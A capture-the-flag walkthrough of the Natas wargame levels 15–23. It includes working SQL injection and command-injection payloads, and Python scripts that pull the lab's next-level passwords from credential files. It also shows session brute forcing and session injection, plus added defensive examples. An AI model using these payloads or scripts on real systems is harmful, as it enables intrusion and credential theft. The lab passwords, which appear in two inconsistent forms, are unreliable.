Natas (level15-level25) detailed walkthrough (Part 2)

level15

URL:http://natas15.natas.labs.overthewire.org
Username:natas15
Password:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Source code

<?

/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas15', '<censored>');
    mysql_select_db('natas15', $link);
    
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
    if(mysql_num_rows($res) > 0) {
        echo "This user exists.<br>";
    } else {
        echo "This user doesn't exist.<br>";
    }
    } else {
        echo "Error in query.<br>";
    }

    mysql_close($link);
} else {
?>

<form action="index.php" method="POST">
Username: <input name="username"><br>
<input type="submit" value="Check existence" />
</form>
<? } ?> 

Test as follows:

payload:index.php?debug=1&username=1" or 1 -- +
result:Executing query: SELECT * from users where username="1" or 1 -- "
This user exists.

The injection succeeds and the page returns "This user exists".
So this level is about blind injection. Rather than writing a script myself, I'll just run sqlmap on it. Copy the request captured by Burp Suite and save it as natas16.txt. For a sqlmap tutorial see "sqlmap study notes (1)".

python sqlmap.py -r natas16.txt --random-agent --dbms=mysql  --level=3 -p username --current-db


python sqlmap.py -r natas16.txt --random-agent --dbms=mysql  --level=3 -p username --threads=10 -D natas15 -T users -C username,password --dump


natas16 password:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

level16

URL:http://natas16.natas.labs.overthewire.org
Username:natas16
Password:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

Source code:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}
?>

This level tests command injection. The characters ; | & ` ' " are filtered. Looking at the source, it resembles natas9 and natas10, but compared with level 10 a regex filter has been added, so the earlier truncation tricks no longer work. However, $() is still expanded by the shell inside the double-quoted string that PHP passes to passthru(), so we can construct an inner grep command whose match is evaluated first:

passthru("grep -i \"$(grep ^a /etc/natas_webpass/natas17)wrong\" dictionary.txt");

If the first character of the password is a, the inner grep finds a match and its output is non-empty; joined with the trailing wrong, the outer search pattern becomes <password>wrong, which matches nothing in dictionary.txt, so the page returns nothing. If the inner grep finds nothing, the outer grep searches for wrong on its own and prints the marker word wrong (or other matching lines). This is the same idea as blind injection, so we can write a script to recover the next level's password.
grep supports regular expressions, so we can first narrow the range with [0-9], [a-z], [A-Z] and then use binary search to make the script more efficient:

passthru("grep -i \"$(grep ^[0-9] /etc/natas_webpass/natas17)wrong\" dictionary.txt");
passthru("grep -i \"$(grep ^[a-z] /etc/natas_webpass/natas17)wrong\" dictionary.txt");
passthru("grep -i \"$(grep ^[A-Z] /etc/natas_webpass/natas17)wrong\" dictionary.txt");
Flowchart (rendered as an image on the original page): start → determine whether the character lies in 0-9, a-z or A-Z → binary search within that range to fix the character → end.
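The bypass works because of what the blacklist does not cover. The added example below (not from the page or the natas source) reproduces natas16's character blacklist in Python, shows that a $( ... ) value passes it untouched, and puts two fixes beside it: quoting the value with shlex.quote, and dropping the shell entirely by passing grep an argument list. The probe string and the path /path/to/secret inside it are constructed placeholders.

```python
import re
import shlex

# The blacklist from the natas16 source, as a Python regex: ; | & ` ' "
BLACKLIST = re.compile(r'[;|&`\'"]')
# A positive allowlist: letters, digits and spaces are all a dictionary lookup needs
ALLOWLIST = re.compile(r'^[A-Za-z0-9 ]*$')


def blacklist_allows(needle):
    # True when the page's preg_match filter would let the value through
    return BLACKLIST.search(needle) is None


def allowlist_allows(needle):
    # True only when every character comes from the permitted set
    return ALLOWLIST.match(needle) is not None


def build_command_unsafe(needle):
    # Mirrors passthru("grep -i \"$key\" dictionary.txt"): the value sits inside
    # double quotes, where the shell still performs $( ... ) substitution
    return 'grep -i "%s" dictionary.txt' % needle


def build_command_quoted(needle):
    # shlex.quote wraps the value in single quotes; the shell expands nothing inside them
    return 'grep -i %s dictionary.txt' % shlex.quote(needle)


def build_argv(needle):
    # Preferred: no shell at all. subprocess.run(build_argv(x)) hands grep the
    # value as one literal argument; "--" stops grep reading it as an option.
    return ["grep", "-i", "--", needle, "dictionary.txt"]


# Constructed probe of the kind the page describes: no blacklisted character,
# but a command substitution the shell would run before grep sees anything.
PROBE = "$(cat /path/to/secret)wrong"

if __name__ == "__main__":
    print("blacklist lets probe through:", blacklist_allows(PROBE))
    print("allowlist lets probe through:", allowlist_allows(PROBE))
    print("unsafe :", build_command_unsafe(PROBE))
    print("quoted :", build_command_quoted(PROBE))
    print("argv   :", build_argv(PROBE))
```

The argument-list form is the one to reach for: it removes the shell from the picture, so no character class has to be enumerated at all.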

The code:

# coding=utf-8
import requests
import time

def reg_char_range(passwd, auth, char_range):
    # Find which class (digits / lower case / upper case) the next character belongs to
    for chars in char_range.keys():
        payload = {'needle': '$(grep ^' + passwd + chars + ' /etc/natas_webpass/natas17)wrong', 'submit': 'Search'}
        req = requests.get(url=url, auth=auth, params=payload)
        if 'wrong' not in req.text:
            return char_range[chars]

def findpass(passwd, chars, auth):
    # Oracle: True when the next character is one of `chars`
    payload = {'needle': '$(grep ^' + passwd + '[' + chars + '] /etc/natas_webpass/natas17)wrong', 'submit': 'Search'}
    req = requests.get(url=url, auth=auth, params=payload)
    return 'wrong' not in req.text

def binary_search_recursion(chars, passwd, auth):
    # Recursive binary search over the candidate characters
    n = len(chars)
    if n < 1:
        return False
    mid = n // 2
    # Compare against the middle value
    if findpass(passwd, chars[mid], auth):
        return passwd + chars[mid]
    # Search the left half
    elif findpass(passwd, chars[:mid], auth):
        return binary_search_recursion(chars[:mid], passwd, auth)
    # Otherwise it must be in the right half; no extra request is needed
    else:
        return binary_search_recursion(chars[mid+1:], passwd, auth)

if __name__ == '__main__':
    start = time.time()
    url = "http://natas16.natas.labs.overthewire.org/index.php"
    auth = requests.auth.HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
    passwd = ""
    char_range = {"[0-9]": "0123456789", "[a-z]": "abcdefghijklmnopqrstuvwxyz", "[A-Z]": "ABCDEFGHIJKLMNOPQRSTUVWXYZ"}
    for i in range(32):  # the password is 32 characters long
        reg_chars = reg_char_range(passwd, auth, char_range)
        passwd = binary_search_recursion(reg_chars, passwd, auth)
        print(passwd)
    end = time.time()
    print('find passwd:%s ,cost time:%s' % (passwd, (end - start)))

Result: find passwd:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw ,cost time:173.7105748653412

Binary search is very common when writing test scripts; a good command of binary search and multithreading helps a lot with running time.
The version without binary search is below; it takes more than three times as long:

import requests
import time

start = time.time()
url = "http://natas16.natas.labs.overthewire.org/"
username = "natas16"
password = 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'
au = requests.auth.HTTPBasicAuth(username, password)
ans = ""
testCharacter = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
i = 0
while i < len(testCharacter):
    # Try each candidate for the next character in turn; a hit hides the marker "hello"
    payload = {'needle': '$(grep -E ^' + ans + testCharacter[i] + '.* /etc/natas_webpass/natas17)hello', 'submit': 'Search'}
    req = requests.get(url, auth=au, params=payload)
    if 'hello' not in req.text:
        ans += testCharacter[i]
        print(ans)
        i = 0
        continue
    i += 1
end = time.time()
print("find passwd:%s,cost time %s" % (ans, end - start))

Next, a script that combines multithreading with binary search. First, some grep runs that show the idea:

[root@192 html]# grep -E \\S\{32\} pass.txt 
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
[root@192 html]# grep -E ^[0-9]\\S\{31\} pass.txt 
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
[root@192 html]# grep -E ^[0-5]\\S\{31\} pass.txt 
[root@192 html]# grep -E ^\\S{1}[A-Z]\\S{30\} pass.txt 
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

Based on the grep runs above, we can binary-search the character at each position independently.
The code:

# coding:utf-8
import time
import requests
import threading
import queue

def get_payload(q, auth, result):
    # Worker: take one position at a time off the queue and binary-search it.
    # get_nowait() avoids the empty()/get() race that could block a thread forever.
    while True:
        try:
            payload_dict = q.get_nowait()
        except queue.Empty:
            return
        chars = payload_dict['chars']
        binary_search_recursion(payload_dict, auth, chars, result)

def findpass(payload, chars, auth, pos):
    # Oracle for one position: \S{pos}[chars]\S{31-pos} matches when the
    # character at `pos` is one of `chars`, and then "wrong" disappears from the page
    payload['needle'] = '$(grep -E \\\\S{%d}%s\\\\S{%d} /etc/natas_webpass/natas17)wrong' % (pos, '[' + chars + ']', 31 - pos)
    req = requests.get(url=url, auth=auth, params=payload)
    return 'wrong' not in req.text

def binary_search_recursion(payload_dict, auth, chars, result):
    # Recursive binary search over the candidate characters for one position
    payload = payload_dict['payload']
    pos = int(payload_dict['pos'])
    if len(chars) < 1:
        return False
    mid = len(chars) // 2
    # Compare against the middle value
    if findpass(payload, chars[mid], auth, pos):
        result[payload_dict['pos']] = chars[mid]
        return result
    # Search the left half
    if findpass(payload, chars[:mid], auth, pos):
        return binary_search_recursion(payload_dict, auth, chars[:mid], result)
    # Otherwise the right half
    if findpass(payload, chars[mid+1:], auth, pos):
        return binary_search_recursion(payload_dict, auth, chars[mid+1:], result)

def reg_char_range(payload, url, auth):
    # Returns the payload if its character class matches at this position
    req = requests.get(url=url, params=payload, auth=auth)
    if 'wrong' not in req.text:
        return payload

if __name__ == "__main__":
    start = time.time()
    threads = []
    q = queue.Queue()
    result = {}

    url = "http://natas16.natas.labs.overthewire.org/index.php"
    auth = requests.auth.HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
    char_range = {'[0-9]': '0123456789', '[a-z]': 'abcdefghijklmnopqrstuvwxyz', '[A-Z]': 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'}
    for i in range(32):  # one payload per position 0..31
        for payload_chars in char_range.keys():
            payload = {'needle': '$(grep -E \\\\S{%d}%s\\\\S{%d} /etc/natas_webpass/natas17)wrong' % (i, payload_chars, 31 - i), 'submit': 'Search'}
            res = reg_char_range(payload, url, auth)
            if res:
                payload_dict = {'payload': res, 'pos': i, 'chars': char_range[payload_chars], 'char_range': payload_chars}
                print("payload dict:%s" % (payload_dict))
                q.put(payload_dict)
                break

    for i in range(8):
        t = threading.Thread(target=get_payload, args=(q, auth, result,))
        threads.append(t)

    for t in threads:
        print(t)
        t.start()

    for t in threads:
        t.join()
        print(t)

    print(result)
    passwd = ''
    for i in sorted(result):
        passwd = passwd + result[i]
    end = time.time()
    print("cost time:%s,passwd is %s" % (end - start, passwd))

With 8 threads the speed improves a lot. Most of the remaining time goes into generating the payloads up front, and that step can be multithreaded as well.
Modified so that payload generation also runs in several threads:

# coding:utf-8
import time
import requests
import threading
import queue

def get_payload(q, auth, result):
    # Worker: take one position off the queue and binary-search its character
    while True:
        try:
            payload_dict = q.get_nowait()
        except queue.Empty:
            return
        binary_search_recursion(payload_dict, auth, payload_dict['chars'], result)

def findpass(payload, chars, auth, pos):
    # Oracle for one position: the class [chars] at offset pos matches when no "wrong" comes back
    payload['needle'] = '$(grep -E \\\\S{%d}%s\\\\S{%d} /etc/natas_webpass/natas17)wrong' % (pos, '[' + chars + ']', 31 - pos)
    req = requests.get(url=url, auth=auth, params=payload)
    return 'wrong' not in req.text

def binary_search_recursion(payload_dict, auth, chars, result):
    # Recursive binary search over the candidates for one position
    payload = payload_dict['payload']
    pos = int(payload_dict['pos'])
    if len(chars) < 1:
        return False
    mid = len(chars) // 2
    # Compare against the middle value
    if findpass(payload, chars[mid], auth, pos):
        result[payload_dict['pos']] = chars[mid]
        return result
    # Search the left half
    if findpass(payload, chars[:mid], auth, pos):
        return binary_search_recursion(payload_dict, auth, chars[:mid], result)
    # Otherwise the right half
    if findpass(payload, chars[mid+1:], auth, pos):
        return binary_search_recursion(payload_dict, auth, chars[mid+1:], result)

def reg_char_range(payload, url, auth):
    # Returns the payload if its character class matches at this position
    req = requests.get(url=url, params=payload, auth=auth)
    if 'wrong' not in req.text:
        return payload

def make_payload(url, auth, char_range, q, q1):
    # Producer: for each position taken from q1, find its character class and
    # queue a payload dict for the search workers
    while True:
        try:
            i = q1.get_nowait()
        except queue.Empty:
            return
        for payload_chars in char_range.keys():
            payload = {'needle': '$(grep -E \\\\S{%d}%s\\\\S{%d} /etc/natas_webpass/natas17)wrong' % (i, payload_chars, 31 - i), 'submit': 'Search'}
            res = reg_char_range(payload, url, auth)
            if res:
                payload_dict = {'payload': res, 'pos': i, 'chars': char_range[payload_chars], 'char_range': payload_chars}
                print("payload dict:%s" % (payload_dict))
                q.put(payload_dict)
                break

if __name__ == "__main__":
    start = time.time()
    threads = []
    threads_num = 8
    q = queue.Queue()
    q1 = queue.Queue()
    result = {}
    passwd = ''
    ths = []
    url = "http://natas16.natas.labs.overthewire.org/index.php"
    auth = requests.auth.HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
    char_range = {'[0-9]': '0123456789', '[a-z]': 'abcdefghijklmnopqrstuvwxyz', '[A-Z]': 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'}
    for i in range(32):
        q1.put(i)

    for _ in range(4):
        t = threading.Thread(target=make_payload, args=(url, auth, char_range, q, q1,))
        ths.append(t)
        t.start()

    for t in ths:
        t.join()

    print("make payload complete!")

    for _ in range(threads_num):
        t = threading.Thread(target=get_payload, args=(q, auth, result,))
        threads.append(t)

    print('start get passwd!')

    for t in threads:
        t.start()
        print(t)
    for t in threads:
        t.join()
        print(t)

    print('result dict complete!')

    for i in sorted(result):
        passwd = passwd + result[i]
    end = time.time()
    print("cost time:%s,passwd is %s" % (end - start, passwd))

It takes about 36 seconds.

level17

URL:http://natas17.natas.labs.overthewire.org
Username:natas17
Password:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

Source code:

<?
/*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas17', '<censored>');
    mysql_select_db('natas17', $link);
    
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    $res = mysql_query($query, $link);
    if($res) {
    if(mysql_num_rows($res) > 0) {
        //echo "This user exists.<br>";
    } else {
        //echo "This user doesn't exist.<br>";
    }
    } else {
        //echo "Error in query.<br>";
    }
    mysql_close($link);
} else {
?> 

The username parameter goes into the database query unfiltered, so injection is possible.

$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";

But nothing is echoed back, so only time-based blind injection is possible.

payload:index.php?debug=1&username=test" or 1 -- +
result:Executing query: SELECT * from users where username="test" or 1 -- "

Submit the payloads and compare:
/index.php?debug=1&username=natas18111" and sleep(5) -- +
With a wrong username the response comes back quickly.
/index.php?debug=1&username=natas18" and sleep(5) -- +
With the correct username the response comes back after 5 seconds.

From the source we already know the database is natas17, the table is users, and it has username and password columns.
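The two injection levels, natas15's boolean oracle and natas17's time-based variant, share one root cause: the username is concatenated into the SQL text. The following added example, not part of the original write-up, mirrors that defect in Python against a constructed in-memory SQLite table with the page's two-column schema and puts the parameterised fix beside it. SQLite string literals are single-quoted, so the probe strings use ' where the page's MySQL query uses "; the user rows and passwords are constructed sample data.

```python
import sqlite3

# Constructed stand-in for the natas `users` table (the page gives only the schema).
SAMPLE_USERS = [("natas16", "sample-password-1"), ("alice", "sample-password-2")]


def make_db():
    # In-memory SQLite database with the same two-column schema as the page
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def user_exists_vulnerable(conn, username):
    # Mirrors the natas15/17 PHP: the request value is spliced into the SQL text.
    # Whatever the value contains (quotes, OR clauses, comments) is parsed as SQL.
    query = "SELECT * FROM users WHERE username='%s'" % username
    try:
        return len(conn.execute(query).fetchall()) > 0
    except sqlite3.Error:
        return None  # the page prints "Error in query." here


def user_exists_safe(conn, username):
    # Parameterised query: the value travels separately from the SQL text and is
    # never parsed as SQL, so the same probe strings are just unknown usernames.
    rows = conn.execute("SELECT * FROM users WHERE username = ?", (username,)).fetchall()
    return len(rows) > 0


def demo():
    conn = make_db()
    tautology = "1' or 1 -- "                                  # true for every row
    probe_hit = "natas16' and substr(password,1,1)='s' -- "    # boolean oracle: first char is 's'
    probe_miss = "natas16' and substr(password,1,1)='x' -- "   # same oracle, wrong guess
    return {
        "vuln_tautology": user_exists_vulnerable(conn, tautology),
        "vuln_probe_hit": user_exists_vulnerable(conn, probe_hit),
        "vuln_probe_miss": user_exists_vulnerable(conn, probe_miss),
        "safe_tautology": user_exists_safe(conn, tautology),
        "safe_real_user": user_exists_safe(conn, "natas16"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The `vuln_probe_hit` / `vuln_probe_miss` pair is exactly the one-bit oracle natas15 exposes through "This user exists."; natas17 removes the message, and the same condition is then read through `sleep()` instead. The parameterised version closes both, because the condition never becomes part of the query. The `debug` echo of the full query on the page is a second defect: it shows an attacker precisely how their input was spliced in.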

PS: multithreading is fast, but time-based detection is inevitably error-prone. I tried several times; when the thread count is high, the sleep time has to be increased to keep the results accurate.

passwd is:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP,cost time is 143.450834274292

Python 3 time-based blind injection script combining multithreading with binary search:

import requests
import time
import threading
import queue

start = time.time()
q = queue.Queue()
url = 'http://natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw@natas17.natas.labs.overthewire.org/index.php'
key = {}
passwd = ''
threads_num = 4
threads = []

def findpass(q, url, key):
    # Each worker takes a password position off the queue and binary-searches
    # its ASCII value within the printable range 32..126
    while True:
        try:
            i = q.get_nowait()
        except queue.Empty:
            return
        print(i)
        lo = 32     # lowest printable ASCII code
        hi = 126    # highest printable ASCII code
        mid = (lo + hi) // 2
        while lo < hi:
            # sleep(8) fires only when mid < ascii(char); a timeout therefore means "go higher"
            payload = r'natas18" and if(%d<ascii(mid(password,%d,1)),sleep(8),1) -- +' % (mid, i)
            try:
                req = requests.post(url=url, data={"username": payload}, timeout=4)
            except requests.exceptions.Timeout:
                lo = mid + 1
                mid = (lo + hi) // 2    # search upwards
                continue
            hi = mid
            mid = (lo + hi) // 2
        key[i] = chr(mid)

for i in range(1, 33):
    q.put(i)

for i in range(threads_num):
    t = threading.Thread(target=findpass, args=(q, url, key,))
    threads.append(t)

for t in threads:
    t.start()

for t in threads:
    t.join()

for i in sorted(key):
    passwd = passwd + key[i]

end = time.time()
print("passwd is:%s,cost time is %s" % (passwd, (end - start)))

level18

URL:http://natas18.natas.labs.overthewire.org
Username:natas18
Password:xvKIqDjy4OPv7wCRgDlmjPpFsCsDjhdP

Source code:

<?

$maxid = 640; // 640 should be enough for everyone

function isValidAdminLogin() { /* {{{ */
    if($_REQUEST["username"] == "admin") {
    /* This method of authentication appears to be unsafe and has been disabled for now. */
        //return 1;
    }

    return 0;
}
/* }}} */
function isValidID($id) { /* {{{ */
    return is_numeric($id);
}
/* }}} */
function createID($user) { /* {{{ */
    global $maxid;
    return rand(1, $maxid);
}
/* }}} */
function debug($msg) { /* {{{ */
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}
/* }}} */
function my_session_start() { /* {{{ */
    if(array_key_exists("PHPSESSID", $_COOKIE) and isValidID($_COOKIE["PHPSESSID"])) {
    if(!session_start()) {
        debug("Session start failed");
        return false;
    } else {
        debug("Session start ok");
        if(!array_key_exists("admin", $_SESSION)) {
        debug("Session was old: admin flag set");
        $_SESSION["admin"] = 0; // backwards compatible, secure
        }
        return true;
    }
    }

    return false;
}
/* }}} */
function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas19\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.";
    }
}
/* }}} */

$showform = true;
if(my_session_start()) {
    print_credentials();
    $showform = false;
} else {
    if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
    session_id(createID($_REQUEST["username"]));
    session_start();
    $_SESSION["admin"] = isValidAdminLogin();
    debug("New session started");
    $showform = false;
    print_credentials();
    }
} 
if($showform) {
?> 

Logging in with the username admin returns "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19." The natas19 password is not revealed; the session has to be verified, and the session id is a positive integer no greater than 640, so it can be brute-forced with Burp Suite.

Select the field to brute-force
Set the payload range
Identify the hit from the differing response length

result:
Username: natas19
Password: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs

level19

URL:http://natas19.natas.labs.overthewire.org
Username:natas19
Password:4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs

This level is like the previous one, except that the session id is longer, 18 digits. Analysis shows there is still a pattern: in the first 6 digits, each pair lies in the range 30-40. Again brute-force with Burp Suite.

Set the payload range of each of the 3 positions to 30-40
Final result:

Username: natas20,Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF


level20

URL:http://natas20.natas.labs.overthewire.org
Username: natas20
Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF

Key code:

function myread($sid) { 
    debug("MYREAD $sid"); 
    if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
    debug("Invalid SID"); 
        return "";
    }
    $filename = session_save_path() . "/" . "mysess_" . $sid;
    if(!file_exists($filename)) {
        debug("Session file doesn't exist");
        return "";
    }
    debug("Reading from ". $filename);
    $data = file_get_contents($filename);
    $_SESSION = array();
    foreach(explode("\n", $data) as $line) {
        debug("Read [$line]");
    $parts = explode(" ", $line, 2);
    if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1];
    }
    return session_encode();
}

explode() splits a string into an array. The file-reading code below first splits on \n (the newline, %0a) and then splits each line on a space (%20):

    $data = file_get_contents($filename);
    $_SESSION = array();
    foreach(explode("\n", $data) as $line) {
        debug("Read [$line]");
        $parts = explode(" ", $line, 2);
        if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1];
    }

Submitting a debug parameter via GET prints the debug output:

function debug($msg) { /* {{{ */
    if(array_key_exists("debug", $_GET)) {
        print "DEBUG: $msg<br>";
    }
}
/* }}} */

Payload breakdown:

payload: ?name=?test%0Aadmin%201&debug
foreach(explode("\n", $data) as $line) ==> [test,admin%201]
$parts = explode(" ", $line, 2);  ==>[admin,1]
$_SESSION[$parts[0]] = $parts[1]  ==>$_SESSION['admin']=1
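The added example below (not from the page) mirrors myread()'s two-level split in Python and shows how a value containing a newline forges a second record. The page does not show mywrite(), so the writer that produces the "key value" lines is an assumption matching what myread() parses. Beside it are two fixes: refusing keys and values that contain line breaks, and using an encoder (JSON) that escapes them so a value can never start a new record.

```python
import json
import re


def parse_session_vulnerable(data):
    # Mirrors myread(): split on "\n", then each line on the first space
    session = {}
    for line in data.split("\n"):
        parts = line.split(" ", 1)
        if parts[0] != "":
            session[parts[0]] = parts[1] if len(parts) > 1 else None
    return session


def write_session_vulnerable(session):
    # Assumed writer matching what myread() expects: one "key value" line per
    # entry, written without any escaping (the page does not show mywrite()).
    return "".join("%s %s\n" % (k, v) for k, v in session.items())


KEY_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*$')


def write_session_safe(session):
    # Same line format, but refuse anything that could forge a second record
    lines = []
    for k, v in session.items():
        if not KEY_RE.match(k):
            raise ValueError("bad session key: %r" % k)
        if "\n" in v or "\r" in v:
            raise ValueError("line break in value for %r" % k)
        lines.append("%s %s\n" % (k, v))
    return "".join(lines)


def write_session_json(session):
    # Structural fix: an encoder that escapes newlines inside values
    return json.dumps(session)


def parse_session_json(data):
    return json.loads(data)


def demo():
    injected = {"name": "test\nadmin 1"}  # the page's payload after URL decoding
    poisoned = parse_session_vulnerable(write_session_vulnerable(injected))
    json_round = parse_session_json(write_session_json(injected))
    try:
        write_session_safe(injected)
        safe_refused = False
    except ValueError:
        safe_refused = True
    return poisoned, json_round, safe_refused


if __name__ == "__main__":
    poisoned, json_round, safe_refused = demo()
    print("vulnerable round trip:", poisoned)      # an "admin" key appears
    print("json round trip      :", json_round)    # the value stays one value
    print("safe writer refused  :", safe_refused)
```

The line-oriented format is only safe while the record separator cannot occur in a value; once the session store accepts a client-controlled string, that invariant must be enforced on write, not assumed.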

result:

Username: natas21
Password: IFekPyrQXftziDEsUr3x21sYuahypdgJ

level21

URL:http://natas21.natas.labs.overthewire.org
Username: natas21
Password: IFekPyrQXftziDEsUr3x21sYuahypdgJ

Hint: the level 21 site is co-hosted with http://natas21-experimenter.natas.labs.overthewire.org

Source code of http://natas21.natas.labs.overthewire.org:

<?
function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas22\n";
    print "Password: <censored></pre>";
    } else {
    print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.";
    }
}
/* }}} */
session_start();
print_credentials();
?> 

We need the session to contain an admin key with $_SESSION['admin']=1.

Source code of http://natas21-experimenter.natas.labs.overthewire.org:

<?  

session_start();

// if update was submitted, store it
if(array_key_exists("submit", $_REQUEST)) {
    foreach($_REQUEST as $key => $val) {
    $_SESSION[$key] = $val;
    }
}

if(array_key_exists("debug", $_GET)) {
    print "[DEBUG] Session contents:<br>";
    print_r($_SESSION);
}

// only allow these keys
$validkeys = array("align" => "center", "fontsize" => "100%", "bgcolor" => "yellow");
$form = "";

$form .= '<form action="index.php" method="POST">';
foreach($validkeys as $key => $defval) {
    $val = $defval;
    if(array_key_exists($key, $_SESSION)) {
    $val = $_SESSION[$key];
    } else {
    $_SESSION[$key] = $val;
    }
    $form .= "$key: <input name='$key' value='$val' /><br>";
}
$form .= '<input type="submit" name="submit" value="Update" />';
$form .= '</form>';

$style = "background-color: ".$_SESSION["bgcolor"]."; text-align: ".$_SESSION["align"]."; font-size: ".$_SESSION["fontsize"].";";
$example = "<div style='$style'>Hello world!</div>";

?> 

Look at the code below: it iterates over every submitted parameter and its value and copies them into the $_SESSION array:

if(array_key_exists("submit", $_REQUEST)) {
    foreach($_REQUEST as $key => $val) {
    $_SESSION[$key] = $val;
    }
}
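Copying every request parameter into the session is a mass-assignment flaw, and because the two virtual hosts share one session store, whatever the experimenter writes is what natas21's print_credentials() reads. The added example below (not part of the original) models that in Python, with the page's $validkeys used as the allowlist that fixes it; the request dictionary is constructed.

```python
# The keys the experimenter form is meant to manage (the page's $validkeys)
VALID_KEYS = {"align": "center", "fontsize": "100%", "bgcolor": "yellow"}


def update_session_vulnerable(session, request):
    # Mirrors the experimenter source: every request parameter becomes a session key
    if "submit" in request:
        for key, val in request.items():
            session[key] = val
    return session


def update_session_safe(session, request):
    # Allowlist: copy only the form's own keys; "admin" or anything else is ignored
    if "submit" in request:
        for key in VALID_KEYS:
            if key in request:
                session[key] = request[key]
    return session


def is_admin(session):
    # Mirrors print_credentials(): $_SESSION["admin"] == 1 is a loose comparison,
    # so the string "1" from a form field passes just like the integer 1
    return str(session.get("admin", "")) == "1"


def demo():
    # Constructed request: the form's three fields plus a smuggled admin flag
    request = {"align": "center", "fontsize": "100%", "bgcolor": "yellow",
               "admin": "1", "submit": "Update"}
    shared_vulnerable = update_session_vulnerable({}, dict(request))
    shared_safe = update_session_safe({}, dict(request))
    # natas21 reads the same session store, so it sees exactly these dictionaries
    return is_admin(shared_vulnerable), is_admin(shared_safe), sorted(shared_safe)


if __name__ == "__main__":
    print(demo())
```

The allowlist is the minimal fix; the more robust one is to keep authorisation state such as `admin` out of any session store that a lower-privilege application can write to.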


Username: natas22
Password: chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ

level22

URL:http://natas22.natas.labs.overthewire.org
Username: natas22
Password: chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ

Source code:

<?
session_start();

if(array_key_exists("revelio", $_GET)) {
    // only admins can reveal the password
    if(!($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1)) {
    header("Location: /");
    }
}
?> 

When the GET parameter revelio is present, header() performs a redirect. In header("Location: /"), header() sends a raw HTTP header to the client; Location means a redirect, and / is the site root, so the page effectively reloads. Note that the script does not exit after header(), so PHP keeps running and the rest of the page is still written into the response body; only a client that follows the redirect never sees it.

<?
    if(array_key_exists("revelio", $_GET)) {
    print "You are an admin. The credentials for the next level are:<br>";
    print "<pre>Username: natas23\n";
    print "Password: <censored></pre>";
    }
?> 

So all we need is to send the revelio GET parameter to get the password:
Username: natas23
Password: D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE


level23

URL:http://natas23.natas.labs.overthewire.org
Username: natas23
Password: D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE

Source code:

<?php
    if(array_key_exists("passwd",$_REQUEST)){
        if(strstr($_REQUEST["passwd"],"iloveyou") && ($_REQUEST["passwd"] > 10 )){
            echo "<br>The credentials for the next level are:<br>";
            echo "<pre>Username: natas24 Password: <censored></pre>";
        }
        else{
            echo "<br>Wrong!<br>";
        }
    }
    // morla / 10111
?>  

